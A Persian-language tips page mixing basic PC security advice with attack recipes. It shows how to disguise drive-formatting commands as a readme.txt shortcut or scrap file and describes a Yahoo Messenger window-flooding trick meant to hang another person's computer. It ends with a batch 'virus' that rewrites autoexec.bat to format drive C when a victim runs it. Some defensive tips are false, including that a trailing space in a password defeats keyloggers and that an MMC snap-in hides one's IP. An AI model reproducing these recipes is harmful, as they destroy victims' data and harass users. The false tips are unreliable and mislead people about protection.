ترفند امنیت

 

پيدا کردن IP فرستنده ایمیل در سایت یاهو

 

با استفاده از ترفندی که به شما معرفی خواهیم کرد میتوانید بدون نیاز به نرم افزار خاصی و

تنها در محیط سایت یاهو و با اندکی تنظیمات ، IP شخصی که برای شما ایمیل فرستاده را

بیابید.

بدین منظور:

ابتدا به صفحه ایمیلتان در یاهو بروید و سپس از بالای صفحه سایت گزينه Options را انتخاب

کنيد.

سپس به قسمت General Preferences بروید. در صفحه باز شده در بخش Messeges و در

قسمت Headers ، تیک گزینه Show all headers on incoming messages را بزنید. سپس در

پایین صفحه بر روی Save کلیک کنید.

حال اگر یکی از ایمیلهای خودتو رو چک کنید در قسمت نام فرستنده میتوانید IP و اطلاعات

دیگری از او را مشاهده کنید.

 

ترفندهایی برای بالا بردن امنیت در برابر هکرها

 

دانستن انواع روش های هک و نفوذ به کامپیوتر و ترفندهای جلوگیری از آن میتواند تا حد

بسیار زیادی شما را در برابر هکرها ایمن کند. نا گفته هایی از پسوندهای فایلها و روش های

پاکسازی آنها ، روشهای تروجانها در هنگام راه اندازی و روشهای راه اندازی برنامه های هک ،

راه هایی از این قبیل هستند که شما بایستی طریقه مقابله با آنها را بلد باشید.

پسوندهاي پنهان فايلهاي ويندوز

ممكن است از اين موضوع آگاهي نداشته باشيد، اما حتي اگر به ويندوز بگوييد كه تمام

پسوندهاي فايل را نشان دهد، هنوز هم فايلهايي وجود دارند كه بطور پيش فرض مخفي

شده‌اند. همچنين هر برنامه نصب شده‌ايي مي‌تواند پسوندها را پيكربندي كند تا پنهان شوند.

در اينجا در مورد چگونگي انجام اين كار و همچنين دليل اينكه چرا برخي از پسوندهاي پنهان

مي‌توانند براي تعدادي از كاربرهاي كامپيوتر خطرناك باشند، مثالهايي آورده شده است. به

فرض اينكه شما قبلا ويندوز explorer را براي نشان دادن تمام پسوندهاي پيكربندي كرده‌ايد.

پسوندهاي SHS

يك كپي از notepad.exe بگيريد و آن را روي desktop خود قرار دهيد. Wordpad را باز كنيد.

روي notepad.exe كليك كنيد و آن را به سمت سند باز شده wordpad بكشيد. روي

notepad.exe كليك كنيد و آن را به عقب به سمت desktop بكشيد. فايلي را كه ايجاد شده

است (Scrap) به Readme.txt تغيير نام دهيد.

حالايك آيكن كه نشان دهنده سند متني است و فايلي با نام مشخص readme.txt بر روي

desktop شما وجود دارد كليك كردن بر روي فايل فوق باعث مي‌شود notepad باز ‌شود. اگر

اين فايل يك Trojan باشد، شما فريب خورده‌ايد و توسط آنچه كه يك فايل متني بي‌خطر بنظر

 مي‌رسيد آلوده شده‌ايد. اگر اجازه نمايش اين پسوند داده مي شد شما فريب فايل

Readme.txt.shs را نمي‌خورديد.

 

پسوندهاي PIF

اگر سعي كنيد تا notepad.exe را به anything.txt.pif تغيير نام دهيد، تنها فايلي با نام

anything.txt روي desktop خود خواهيد ديد. و اين بدين دليل است كه PIF پسوند ديگري

است كه ويندوز بطور پيش فرض پنهان مي‌كند. اگر شما فايل را اجرا كنيد برنامه اجرا خواهد

شد، به خاطر اينكه ويندوز پسوندهاي PIF را اجرا خواهد كرد حتي اگر آنها فايلهاي اجرايي

باشند.

پسوندهاي SCR

پسوند ديگري كه بايد مراقب آن بود SCR است. كپي notepad.exe خود را به notepad.scr

تغيير نام دهيد و روي آن كليك كنيد. Notepad به عنوان يك فايل اجرايي اجرا خواهد شد.

بسياري از افراد توسط هكرهايي فريب مي‌خورند كه account يك قرباني را بدست آورده‌اند.

هكر email يا هر نوع پيغامي را به تمام دوستان قرباني مي‌فرستد كه "اين صفحه نمايش

جديد و بامزه را ببينيد از خنده روده بر خواهيد شد!" از آنجايي كه اين پيغام از يك منبع مطمئن

آمده، اكثر افراد فريب خورده و فايل SCR را اجرا مي‌كنند كه در نهايت به هكري ختم مي‌شود

كه به كامپيوتر شما متصل شده است.

پسوندهاي ميانبر PIF

برخي از پسوندهاي پنهان فايل قادرند به سادگي با فرمانهاي پنهان شده‌اي كه مي‌توانند براي

سيستم شما مخرب باشند برنامه‌ريزي شوند. اين يك آزمايش ساده است:

دكمه راست ماوس خود را روي desktop كليك كنيد و New و سپس Shotcut را انتخاب نماييد.

در Command line دستورformat a:/autotest تايپ كنيد. حالا Next را كليك كنيد. در "Select a

name for the shortcut" تايپ كنيد: readme.txt . سپس Next را كليك كنيد. يك آيكن

notepad را انتخاب كرده و Finish را كليك كنيد. حالا شما در desktop خود فايلي با نام

readme.txt و با آيكن notepad داريد. مطمئن شويد كه در درايو شما ديسكي است كه از

دست دادن آن براي شما اشكالي ندارد و روي آيكن كليك كنيد. فايلي كه شما روي آن كليك

كرده‌ايد درايو A: را فرمت خواهد كرد. البته آيكن هكر درايو ديگري را مورد هدف قرار خواهد

داد يا ممكن است نامي همچون ‘game.exe’ و فرماني براي حذف كردن دايركتوري ويندوز

شما يا (deltree /y C:/*.*) كل درايو C شما داشته باشد. اگر پسوند PIF پنهان نشود، قادر به

فريب شما نخواهد بود.

 

پسوند SHS

فايلهاي Scrap نيز مي‌توانند فرمانهاي گنجانده شده را پنهان كند. اين يك آزمون ساده است: از

notepad.exe يك كپي بگيريد و آن را روي desktop خود قرار دهيد. Wordpad را باز كنيد.

Notepad.exe را كليك كنيد و آن را به سمت سند باز شده wordpad بكشيد. روي Edit كليك

كنيد و Package Object و سپس Edit package را انتخاب كنيد. روي Edit و سپس Command

Line كليك كنيد.

در كادر، دستوري مانند format a:/autotest را تايپ كنيد و روي OK كليك كنيد. آيكن نيز

مي‌تواند از اين پنجره تغيير يابد. از پنجره خارج شويد، اين كار سند را به روز خواهد كرد. روي

notepad.exe كليك كنيد و آن را به عقيب به سمت Desktop بكشيد. فايلي را كه ايجاد شده (

Scrap) به Readme.txt تغيير نام دهيد.

حالا شما آنچه را كه شبيه يك فايل متني است داريد. اگر اين فايل اجرا شود درايو A: را فرمت

خواهد كرد. همانگونه كه در مثال بالا براي پسوندهاي ميانبر PIF ديده شد، هكر مي‌تواند از

فرمانهاي خطرناكتري استفاده كند.

روشهاي Trojan در هنگام راه اندازي

روشهاي راه اندازي استاندارد

اكثر افراد از راههاي متفاوتي كه هكرها براي راه اندازي فايلهاي Trojan استفاده مي‌كنند

آگاه نيستند. اگر هكري كامپيوتر شما را با يك Trojan آلوده كند، نياز به انتخاب يك روش

راه‌اندازي خواهد داشت، بگونه‌اي كه در زمان راه‌اندازي مجدد كامپيوتر شما Trojan بارگذاري

شود. روشهاي معمول راه‌اندازي شامل كليدهاي اجرايي registry، فولدر راه اندازي ويندوز،

Windows Load= يا run=lines يافته شده در فايل win.ini و shell=line يافته شده در

system.ini ويندوز مي‌باشند.

روشهاي راه اندازي خطرناك

از آنجايي كه فقط تعداد اندكي از اين روشهاي راه اندازي وجود دارند، هكرهاي زيادي را

يافته‌ايم كه در پيدا كردن روشهاي جديد راه‌اندازي افراط مي‌كنند. اين شامل استفاده از

تغييرات خطرناكي در سيستم registry مي‌باشد، كه در صورتي كه فايل Trojan يا فايل

همراه آن از بين برود سيستم را بصورت بلااستفاده درخواهد آورد. اين يك دليل استفاده نكردن

از نرم افزار ضد ويروس براي از بين بردن Trojanهاست. اگر يكي از اين روشها استفاده شود،

و فايل بدون ثابت كردن registry سيستم از بين برود، سيستم شما قادر به اجراي هيچگونه

برنامه‌اي پس از راه اندازي مجدد كامپيوترتان نخواهد بود.

قبل از آنكه سراغ registry برويم لازم به توضيح است كه يك فولدر به صورت

C:/WINDOWS/StartMenu/Program/StartUp وجود دارد كه هر فايلي در اينجا باشد هنگام

راه اندازي ويندوز اجرا خواهد شد.توجه داشته باشيد كه هرگونه تغييري مي‌تواند سيستم

شما را به خطر بياندازد بنابراين، هرچه ما مي‌گوييم انجام دهيد. براي دستيابي به registry به

منوي start>run> برويد و "regedit" را بدون علامت " " تايپ كنيد. در registry چندين مكان

براي راه اندازي Startup وجود دارد كه ليستي از آنها را در اينجا مي آوريم.

HKEY_CLASSES_ROOT/exefile/shell/open/command] ="/"%1/" %*"
HKEY_CLASSES_ROOT/comfile/shell/open/command] ="/"%1/" %*"
HKEY_CLASSES_ROOT/batfile/shell/open/command] ="/"%1/" %*"
HKEY_CLASSES_ROOT/htafile/Shell/Open/Command]="/"%1/" %*"
HKEY_CLASSES_ROOT/piffile/shell/open/command] ="/"%1/" %*"
HKEY_LOCAL_MACHINE/Software/CLASSES/batfile/shell/open/command] ="/"%1" %*"
HKEY_LOCAL_MACHINE/Software/CLASSES/comfile/shell/open/command]="/"%1/" %*"
HKEY_LOCAL_MACHINE/Software/CLASSES/exefile/shell/open/command]="/"%1/"%*"
HKEY_LOCAL_MACHINE/Software/CLASSES/htafile/Shell/Open/Command]="/"%1/"%*"
HKEY_LOCAL_MACHINE/Software/CLASSES/piffile/shell/open/command]="/"%1

 

اگر اين كليدها مقدار "/"%1/"%*" را نداشته باشند و به جاي اجراي فايل در هنگام راه

اندازي به "/"Server.exe %1/" %*" تغيير يابد به احتمال زياد يك Trojan است.

روش راه اندازي ICQ

روشي راه اندازي ديگري كه امروزه استفاده از آن معمول است شناسايي شبكه ICQ

مي‌باشد. بسياري از كاربران ICQ نمي‌دانند كه هكر مي‌تواند يك خط پيكربندي را به ICQ اضافه

نمايد تا با هر بار بارگذاري شدن برنامه Trojan نيز راه اندازي شود. به عنوان آزمايش مراحل زير

را انجام دهيد:

 
ICQ را باز كنيد. روي آيكن ICQ كليك كنيد و preference را انتخاب نماييد. روي Edit launch List

كليك كنيد. روي Add كليك كنيد. روي Browse كليك كنيد. فايلي را براي اضافه كردن به

Windows/notepad.exe بيابيد كه به كار اين آزمايش بيايد. روي Open و سپس OK كليك كنيد.

زماني كه شما ICQ را راه اندازي مجدد مي‌كنيد فايل اجرا خواهد شد.

 

يك روش ساده اما هميشه كارآمد براي حفظ رمز عبور

 

قصد داريم يك ترفند جالب و در عين حال ساده را به شما معرفي كنيم كه با بهره گيري از آن

ميتوانيد پسورد ياهو مسنجر و همين طور ساير رمزهاي عبور خود را از دست هكرها در امان

بداريد. با اين ترفند كار بسياري از تروجان ها و برنامه هاي جاسوسي صفحه كليد را دچار

اختلال خواهيد كرد.

در الگوريتم بسياري از نرم افزارهاي جاسوسي صفحه كليد (‌KeyLoger)و تروجان ها ، كليد

Space در انتهاي پسورد در نظر گرفته نشده است.

از همين طريق ميتوان اين ترفند را صورت داد:

كافي است در پسوردي كه براي خود ايجاد ميكنيد در پايان آن يك Space بزنيد و يك فاصله

ايجاد كنيد. به همين راحت كار بسياري از نرم افزارهاي دشمن را دچار اختلال كرده ايد.

دقت كنيد از اين به بعد بايد هنگام وارد كردن پسورد ، Space را هم در پايان پسورد بزنيد.

به عنوان مثال براي رمز عبور naslejavan كافي است آن را به صورت [naslejavan[space

ثبت كنيم.

هنگامي كه پسورد شما هك ميشود ديگر Space براي هكر نشان داده نميشود و او پسورد را

به همان شكل naslejavan ميبيند.

 

مخفی کردن IP در برابر هکرها

 

 

در صورتی که تنها سررشته ای از هک و امنیت را داشته باشید میدانید که بسیاری از هکرها

برای نفوذ به سیستم قربانی از IP او استفاده میکنند. با استفاده از این ترفند میتوانید کاری

کنید که IP شما برای همیشه دور از دسترس این افراد باشد و به نوعی به طور کامل IP

خودتان رو از دسترس دیگران مخفی نگه دارید.

برای این کار:

1- ابتدا از منوی Start به Run رفته و در محیط Run عبارت MMC را تایپ نمایید.

2- در محیط جدید ، از منوی File به قسمت Add/Remove Snap-in بروید.

3- در پنجره باز شده بر روی دکمه Add کلیک کنید.

4- در پنجره جدید ، بر روی IP Security Policy Management کلیک کرده و دکمه Add را بزنید.

5- سپس Finish را زده و خارج شوید.

6- در پنجره قبلی بر روی Ok کلیک کنید.

7- حال در همان محیط اولیه هستید. در حال حاضر آیکون کناری عبارت IP Security Policy

Management زرد رنگ است. اکنون میبایست یکبار بر روی آن کلیک کنید تا رنگ آن به سبز

تغییر پیدا کند.

8- در پایان از منوی File به Exit رفته و با انتخاب Yes این عملیات را ذخیره کنید.

 

متداولترين اشتباهات كاربران در هنگام کار با کامپیوتر

 

در این ترفند قصد داریم به معرفی متداول ترین اشتباهات کاربران در تمامی سطوح دانسته ها

بپردازیم. بیشتر این اشتباهات به مسائل امنیتی مربوط میشود. نصب بی رويه نرم افزار

خصوصأ نرم افزارهائی كه از طريق اينترنت دريافت می گردد ، كليك بر روی دكمه OK در يك

جعبه محاوره ای كه ممكن است باعث تغيير تنظيمات يك برنامه و در نهايت رفتار يك كامپيوتر و

حتی در برخی موارد از كارافتادن سيستم گردد ،‌ نمونه هائی اندك در اين زمينه می باشند.

پیشنهاد میکنیم این ترفند را حتما با دقت مطالعه بفرمایید چرا که ممکن است شما نیز این

اشتباهات را مرتکب شوید و خودتان بی خبر باشید!

 

اتصال كامپيوتر به برق بدون استفاده از يك سيستم حفاظتی به منظور كنترل نوسانات جريان

برق : عدم رعايت اين موضوع می تواند باعث صدمه فيزيكی به كامپيوتر و از بين رفتن داده

موجود بر روی آن گردد . برخی از كاربران اين تصور را دارند كه صرفا" پس از بروز يك شوك

الكتريكی قوی احتمال بروز مشكل برای سيستم وجود خواهد داشت . ضمن رد اين برداشت ،

می بايست به اين نكته اشاره گردد كه هر چيزی كه بتواند در سيگنال های الكتريكی وقفه ای

را ايجاد و جريان برق را مجددا" از ابتدا آغاز نمايد ، می تواند باعث سوزاندن قطعات كامپيوتر

گردد . استفاده از برخی وسايل برقی ، خصوصا" دستگاه هائی‌ نظير سشوار و هيتر كه به

ولتاژ بالائی نياز دارند ، می تواند باعث ايجاد نوسانات شديد گردد . پس از قطع جريان برق و

اتصال مجدد آن نيز ممكن است تا رسيدن به يك سطح ولتاژ مطلوب ، زمانی بطول انجامد ( هر

چند اندك ) و در همين فاصله ممكن است مشكلات خاصی برای برخی از دستگاه ها ايجاد

گردد .

برای حفاظت سسيستم در مقابل خرابی ناشی از نوسانات شديد جريان برق ، می بايست از

يك محافظ مناسب استفاده نمود . استفاده از ups ( برگرفته از Uninterruptible Power

Supply ) در بسياری از موارد نسبت به دستگاه های محافظ ترجيح داده شود ،‌ چراكه اين نوع

دستگاه ها دارای امكانات مناسبی می باشند كه می توان عليرغم قطع جريان برق همچنان از

كامپيوتر استفاده و در صورت لزوم سيستم را بطور موفقيت آميز خاموش نمود .

 

استفاده از اينترنت بدون فايروال : تعداد زيادی از كاربران ( خصوصا" كاربرانی كه از طريق

منزل به اينترنت متصل می شوند ) ، كامپيوتر خود را به مودم متصل و بلافاصله از اينترنت

استفاده می نمايند ، بدون اين كه نسبت به اين موضوع آگاهی داشته باشند كه خود را در

معرض چه تهديداتی قرار داده اند . هر كامپيوتر متصل به اينترنت می بايست با بكارگيری

فايروال ، حفاظت گردد . فايروال ، می تواند بخشی درون مودم / روتر و يا يك دستگاه جداگانه

باشد كه بين مودم /روتر و كامپيوتر قرار می گيرد و يا يك نرم افزار خاص باشد كه بر روی

كامپيوتر نصب می گردد (نظير فايروال ارائه شده به همراه ويندوز XP ) . نصب يك فايروال به

تنهائی كافی نبوده و می بايست پيكربندی آن را با رعايت مسائل امنيتی انجام داد .

 

قصور در اجراء و يا بهنگام سازی نرم افزارهای آنتی ويروس و آنتی spyware : بدون شك ،

برنامه های آنتی ويروس دارای يك نقش اساسی به منظور ايمن سازی يك كامپيوتر می

باشند . به دنبال نصب اينگونه نرم افزارها ممكن است كاربران با مشكلات خاصی در خصوص

اجرای برخی برنامه های كامپيوتری مواجه و يا به منظور نگهداری و بهنگام سازی آنان هزينه

های خاصی را متقبل شوند ، ولی مسائل فوق نمی تواند دلايل قانع كننده و منطقی به منظور

عدم نصب و بهنگام سازی يك نرم افزار آنتی ويروس بر روی سيستم باشد . برنامه های

مخرب كه نرم افزارهای آنتی ويروس آنان را به عنوان ويروس ، تروجان و يا كرم ها تشخيص

خواهند داد ، علاوه بر اين كه ممكن است مشكلات خاصی را برای يك سيستم ايجاد نمايند ،

می تواند يك شبكه كامپيوتری را نير با مشكلات عديده ای مواجه نموده و حتی باعث از

كارافتادن سرويس های شبكه گردند .

spyware ، نوع ديگری از تهديدات فزاينده در عصر حاضر می باشند كه بر روی كامپيوتر كاربران

و بدون آگاهی آنان نصب و اقدام به جمع آوری اطلاعات و ارسال آنان به يك مكان ديگر می

نمايند . برنامه های آنتی ويروس ، اغلب قادر به تشخيص و برخورد مناسب با اين نوع برنامه

های مخرب نمی باشند ، بنابراين می بايست از يك نرم افزار اختصاصی تشخيص spyware

استفاده گردد .

 

نصب و uninstall برنامه های مختلف خصوصا" نسخه های beta : تعداد زيادی از كاربران

كامپيوتر تمايل دارند كه از آخرين فن آوری ها و نرم افزارهای موجود استفاده نمايند . اين گروه

از كاربران، همواره اقدام به نصب نسخه های جديد نرم افزارها بر روی سيستم خود می

نمايند . نسخه های beta معمولا" رايگان می باشند و اين فرصت را در اختيار كاربران علاقه

مند قرار می دهند كه قبل از ارائه نسخه نهائی كه اكثر كاربران با آن كار خواهند كرد ، با

ويژگی ها و پتانسيل های آن آشنا شوند . همچنين ، امروزه می توان نرم افزارهای

shareware و freeware متعددی را در اينترنت يافت كه كاربران علاقه مند و كنجكاو را ترغيب

به دريافت و نصب آنان بر روی سيستم بدون توجه به مسائل امنيتی می نمايد .

به موازات افزايش تعداد نرم افزارهای نصب شده و يا متعاقب آن uninstall كردن آنها ، احتمال

بروز مشكلات متعددی برای كاربران وجود خواهد داشت . حتی در صورتی كه نرم افزارهای

اشاره شده قانونی باشند ، با نصب و uninstall آنها ، ممكن است برای ريجستری مشكل

ايجاد گردد چراكه تمامی برنامه های uninstall قادر به حذف تمامی تنظميات انجام شده در

ريجستری نمی باشند. مشكل فوق ، در نهايت كند شدن سيستم را به دنبال خواهد داشت .

پيشنهاد می گردد ‌، صرفا" برنامه هائی را كه ضرورت استفاده واقعی از آنان احساس و از

عملكرد آنان اطمينان حاصل شده است را بر روی سيستم نصب نمود. همچنين ، می بايست

تعداد دفعات نصب و uninstall نرم افزار را به حداقل مقدار ممكن رساند .

 

پركردن فضای ذخيره سازی هارد ديسك و تقسيم آن به بخش های مختلف (

fragmentation) : يكی از نتايج نصب و uninstall كردن برنامه ها و يا اضافه و حذف داده ،

fragmentation ديسك است . علت بروز مشكل فوق به ماهيت و روش ذخيره اطلاعات برمی

گردد . در يك ديسك جديد ، از بخش های پيوسته و پشت سرهم ( موسوم به كلاستر ) در

زمان ذخيره يك فايل استفاده می گردد . در صورتی كه اقدام به حذف فايلی گردد كه پنج

كلاستر را اشغال كرده است و در ادامه فايل جديدی را ايجاد نمائيم كه به هشت كلاستر جهت

ذخيره شدن نياز داشته باشد ، پنج كلاستر اوليه به آن اختصاص داده شده و سه كلاستر ديگر

از بخش ديگری بر روی ديسك به آن اختصاص داده می شود . بدين ترتيب ، اطلاعات موجود در

فايل در دو مكان متفاوت ذخيره می گردند . در ادامه و به منظور دستيابی به فايل ، هدهای

هارد ديسك می بايست با قرار گرفتن در مكان های مختلف اقدام به بازيابی اطلاعات يك فايل

نمايند . بدين ترتيب ، سرعت دستيابی به فايل كاهش و در صورتی كه فايل اشاره شده مربوط

به يك برنامه باشد ، سرعت آن برنامه نيز كاهش خواهد يافت .

برای استفاده از برنامه disk defragmenter در ويندوز می توان از مسير Programs |

Accessories | System Tools برنامه را فعال و يا از ساير برنامه های موجود استفاده نمود .

برنامه های فوق با سازماندهی مجدد فايل ها ، آنها را حتی المقدور در مكان های پشت

سرهم قرار خواهند داد . بدين تريتب ، سرعت دستيابی به اطلاعات ذخيره شده بر روی هارد

ديسك افزايش خواهد يافت .

باز كردن تمامی ضمائم همراه نامه های الكترونكيی : فايل های ضميمه ارسالی همراه يك

email می تواند مشكلات امنيتی متعددی را برای كاربران ايجاد نمايد. حذف اطلاعات موجود بر

روی سيستم و يا ارسال ويروس برای افرادی كه آدرس آنان در ليست تماس می باشد از

جمله مشكلات فوق می باشد . متداولترين فايل های ضميمه خطرناك ، فايل هائی اجرائی

(فايل هائی كه توان اجرای كد را دارند) با انشعاب exe . و يا cmd . می باشند . فايل هائی كه

خود توان اجرای مستقيم را ندارند نظير فايل های doc . برنامه word و يا فايل های xls . برنامه

اكسل ، نيز می توانند حاوی كدهای مخرب باشند . اسكريپت ها ( Vbscript ,javaScript و

فلش ) نيز مستقيما" اجراء نمی شوند ولی می توانند توسط ساير برنامه ها اجراء شوند .

برخی از كاربران اين تصور را دارند كه فايل های متن با انشعاب txt . و يا فايل های گرافيكی (

gif, .jpg, .bmp .) ايمن می باشند ولی همواره اينچنين نخواهد بود . انشعاب يك فايل می تواند

جعل شود و مهاجمان از تنظيمات پيش فرض ويندوز كه انشعاب فايل های متداول را نمايش

نمی دهد ، سوء استفاده نمايند . به عنوان نمونه ، فايل greatfile.jpg.exe كه انشعاب واقعی

آن مخفی است به صورت greatfile.jpg نمايش داده خواهد شد و كاربران فكر می كنند كه

فايل فوق يك فايل گرافيكی است ولی در واقع يك برنامه مخرب است .

كاربران كامپيوتر می بايست صرفا" در مواردی كه انتظار دريافت يك email به همراه ضميمه

مورد نظر را از يك منبع تائيد شده و در آن زمان خاص دارند ، اقدام به بازنمودن فايل های

ضميمه نمايند . حتی در صورتی كه يك نامه الكترونيكی به همراه فايل ضميمه ای را دريافت

می نمائيد كه نسبت به هويت ارسال كننده آن هيچگونه ترديدی وجود ندارد ، اين احتمال وجود

خواهد داشت كه آدرس فوق توسط مهاجمان جعل و يا توسط كامپيوتری آلوده به ويروس و

بدون اطلاع صاحب آن ارسال شده باشد .

 

كليك بر روی هر چيز : باز نمودن فايل های ضميمه تنها نوع كليك بر روی موس نمی باشد كه

می تواند مشكلات امنيتی متعددی را برای كاربران ايجاد نمايد . كليك بر روی لينك موجود در

يك نامه الكترونيكی و يا صفحه وب نيز می تواند كاربران را به سمت يك وب سايت مخرب

هدايت نمايد . در اين نوع سايت ها ، احتمال انجام هرگونه عمليات مخربی وجود خواهد

داشت . پاك كردن هارد ديسك ، نصب يك backdoor كه به مهاجمان اين امكان را خواهد داد تا

كنترل يك سيستم را بدست بگيرند ، نمونه هائی در اين زمينه می باشد .

كليك بر روی لينك های نامناسب ، می تواند كاربران را به سمت يك وب سايت نامناسب نظير

سايت های پرونوگرافی ، موزيك ها و يا نرم افزارهای سرقت شده و ساير محتوياتی كه ممكن

است برای كاربران مشكلاتی را به دنبال داشته باشد ، هدايت نمايد . قبل از كليك بر روی يك

لينك ، می بايست نسبت به عواقب آن فكر كرد و هرگز جذب پيام های اغواكننده نگرديد .

 

اشتراك فايل ها و اطلاعات : شايد به اشتراك گذاشتن برخی چيزها در زندگی روزمره امری

مطلوب باشد ( نظير اشتراك دانش ) ولی در زمان حضور در يك شبكه با كاربران گمنام و

بيشمار ، اشتراك فايل ها و ... می تواند تهديدات امنيتی خاص خود را برای كاربران به دنبال

داشته باشد . در صورتی كه امكان اشتراك فايل و چاپگر فعال است ، ساير كاربران می توانند

از راه دور به سيستم متصل و به داده موجود بر روی آن دستيابی داشته باشند . حتی

المقدور می بايست گزينه file and printer sharing غيرفعال گردد و در صورتی كه لازم است

برخی فولدرها به اشتراك گذاشته شوند ، می بايست از آنان در دو سطح متفاوت حفاظت

نمود : مجوزهای share-level و مجوزهای file-level ( مجوزهای مبتنی بر NTFS ) . در چنين

مواردی می بايست از استحكام رمزهای عبور در نظر گرفته شده برای local account و local

administrator نيز اطمينان حاصل نمود .

 

انتخاب رمزهای عبور ضعيف : انتخاب رمزهای عبور ضعيف می تواند كاربران را در معرض

تهديدات امنيتی متعددی قرار دهد . حتی اگر كاربران وابسته به شبكه ای نمی باشند كه

مديريت شبكه از آنان می خواهد كه از رمزهای عبور قوی استفاده و بطور مستمر آنها را تغيير

دهند ، می بايست از رمزهای عبور قوی استفاده گردد . از رمزهای عبوری كه امكان حدس

آنها به سادگی وجود دارد نظير تاريخ تولد ، نام فرد مورد علاقه ، شماره شناسنامه و ... نمی

بايست استفاده گردد . تشخيص رمزهای عبور طولانی برای مهاجمان بمراتب مشكل تر

است . بنابراين ، پيشنهاد می گردد كه از رمزهای عبوری با حداقل هشت حرف استفاده گردد

( چهارده حرف مناسب تر است ) . در برخی موارد مهاجمان به منظور تشخيص رمز عبور

كاربران از روش هائی موسوم به حملات "ديكشنری " استفاده می نمايند . بنابراين ، نمی

بايست رمز عبور خود را از كلماتی انتخاب نمود كه مشابه آن در ديكشنری موجود باشد . رمز

عبوری را انتخاب ننمائيد كه به دليل مشكل بودن بخاطر سپردن آن مجبور به نوشتن آن در يك

مكان ديگر شد، چراكه اين احتمال وجود خواهد داشت كه مهاجمان نيز به آن دستيابی پيدا

نمايند . برای ايجاد يك رمز عبور ، می توان يك عبارت خاص را در نظر گرفت و از حروف اول هر

يك از كلمات آن استفاده نمود.

 

عدم توجه به ايجاد يك استراتژی خاص برای backup : حتی اگر شما تمامی موارد اشاره شده

را رعايت نمائيد ، همچنان اين احتمال وجود خواهد داشت كه مهاجمان به سيستم شما

دستيابی و داده موجود بر روی آن را حذف و يا حتی تمامی اطلاعات موجود بر روی

هاردديسك را پاك كنند . بنابراين ، لازم است كه همواره از اطلاعات مهم موجود backup گرفته

شود و از يك برنامه زمانبندی خاص در اين رابطه استفاده گردد .

اكثر كاربران نسبت به گرفتن backup و مزايای آن آگاهی كامل دارند ولی تعداد زيادی از آنان

هرگز اين كار را انجام نمی دهند . برخی ديگر اولين backup را می گيرند ولی آن را به صورت

مستمر و سازمان يافته ادامه نمی دهند .

با استفاده از برنامه های موجود در ويندوز نظير Ntbackup.exe و يا ساير نرم افزارها ، می

توان زمانبندی backup را بگونه ای انجام داد كه اين فرآيند بطور اتوماتيك انجام شود . داده

backup را می بايست در يك سرويس دهنده ديگر شبكه و يا درايو removable و در مكانی

متمايز از كامپيوتر فعلی نگهداری نمود .

بخاطر داشته باشيد كه داده مهمترين چيز برروی يك كامپيوتر است . سيستم عامل و ساير

برنامه ها را می توان مجددا" نصب نمود ولی بازيابی داده اوليه مشكل و در بسياری از موارد

نيز غيرممكن است

 

فرستادن چندین pm به یک شخص در یک لحظه!

 

در اینجا قصد داریم شما را با ترفندی جالب آشنا کنیم که به وسیله آن و در محیط یاهو مسجر

و بدون نیاز به برنامه خاصی بتوانید شخصی را بوت کنید و به وسیله آن کاری کنید که سیستم

شخص مورد نظر هنگ کند و در نتیجه از یاهو مسنجر Sign out شود.

تنها كافيست كه در قسمت :send to در yahoo messenger جلوي id طرف shift رو بگيريد بعد

2 تا + بذاريد مثلا ((++send to:Naslejavan)) بعد در قسمت text box (همان قسمتي كه

مي نويسيد) برويد و همزمان كليد هاي shift و enter و هر حرفي كه دلتون ميخواد رو بزنيد

اين كار بايد خيلي سريع انجام بشه مثلا 30 دفعه پشت سر هم چنين كاري رو كنيد. حالا براي

طرف به تعداد دفعاتي كه اين كار ميكنيد صفحه باز ميشه اگر چنين كاري رو بيش از 100

مرتبه انجام بديد ممكن كه كامپيوتر طرف هنگ كنه! اگه بخواهيد ببينيد كه چه اتفاقي براي

طرف ميفته ميتونيد id خودتون رو امتحان كنيد.

 

شناسایی فایلهای هک

 

چگونه فايل هاي هك را شناسايي كنيم؟ سوالی که بسیاری از کاربران روزانه از خودشان

میپرسند. در دنیای ناامن اینترنت ، این سوال یکی از مهم ترین ارکان امنیتی سیستمهای

کامپیوتری میباشد. به عنوان مثال در هنگام چت کردن چگونه پی ببریم فایلی که برای ما

ارسال شده یک فایل هک است یا خیر؟ در این ترفند قصد داریم روش های شناسایی این

فایلهای خطرناک را به شما معرفی کنیم.

وقتي شخصي فايلي را براي شما از طریق یاهو مسنجر ارسال مي كند در پيغامي كه براي

شما مبني بر تاييد آن مي آيد نام شخص فرستنده نام فايل حجم آن و همچنين فرمت و از اين

قبيل اطلاعات در آن قيد شده است . شما بايد توجه داشته باشيد كه آيا فايلي كه براي شما

ارسال شده از لحاظ نوع و فرمت همان فايلي است كه قرار بوده ارسال شود يا خير ؟

در حقيقت مثلا اگر عكسي مي خواهيد دريافت كنيد ايد فايل مربوطه پسوند JPG و يا يكي از

پسوندهاي فايلهاي گرافيكي را داشته باشد.

نه اينكه فايلي با پسوند اجرايي Exe و يا Bat براي شما ارسال شود و فرستنده هم مدعي

باشد كه اين يك فايل تصويري است.

در واقع فايلهاي هك كه با نرم افزارهای تروجان ساز ساخته مي شوند ، در قسمت پسوند

داراي پسوندهايي مثل SCR يا ExE و ... و يا مثل mypic. jpg.scr مي باشند كه نشان دهنده آن

است كه فايل فرستاده شده يكي از انواع فايل هاي ساخته شده توسط نرم افزارهای مخرب

است كه براي بدست اوردن پسورد شما مي باشد.

بنابراين همواره نوع پسوند فايلهاي دريافتي را زير نظر داشته باشيد و بدانيد كه از اين طريق و

قبل از هر چيز (حتي قبل از استفاده از نرم افزارهاي ضد هك و ضد ويروس) مي توانيد تا حد

زيادي از كيفيت نوع و چگونگي عملكرد و ماهيت يك فايل اطلاع حاصل كنيد.

فرضأ مطمئن باشيد كه يك فايل ويروسي نباشد ميتواند پس از اجرا بلا هاي ناخواسته برسر

سيستم شما بياورد.

 

ساخت یک ویروس کوچک برای فرمت کردن یک درایو مشخص

 

این بار قصد داریم برای شما یک ترفند خطرناک را بازگو کنیم که با استفاده از آن میتوانید از

طریق Notepad ویندوز یک فایل بسازید و آن را برای شخص مورد نظر بفرستید. کافی است

فرد مورد نظر فایل را یکبار اجرا کند و آنگاه یکی از درایوهای کامپیوتر فرد ، که شما آن را

تعیین کرده اید فرمت خواهد شد!

بدین منظور:

ابتدا برنامه Notepad ویندوز را اجرا کنید ( Start/All Programs/Accessories )

سپس با استفاده از فرمان Copy & Paste کدهای زیر را در محیط برنامه کپی کنید:

@ echo off
call attrib -r -h c:autoexec.bat > nul
echo @echo off > c:autoexec.bat
echo format /autotest c:/q > nul >> c:autoexec.bat
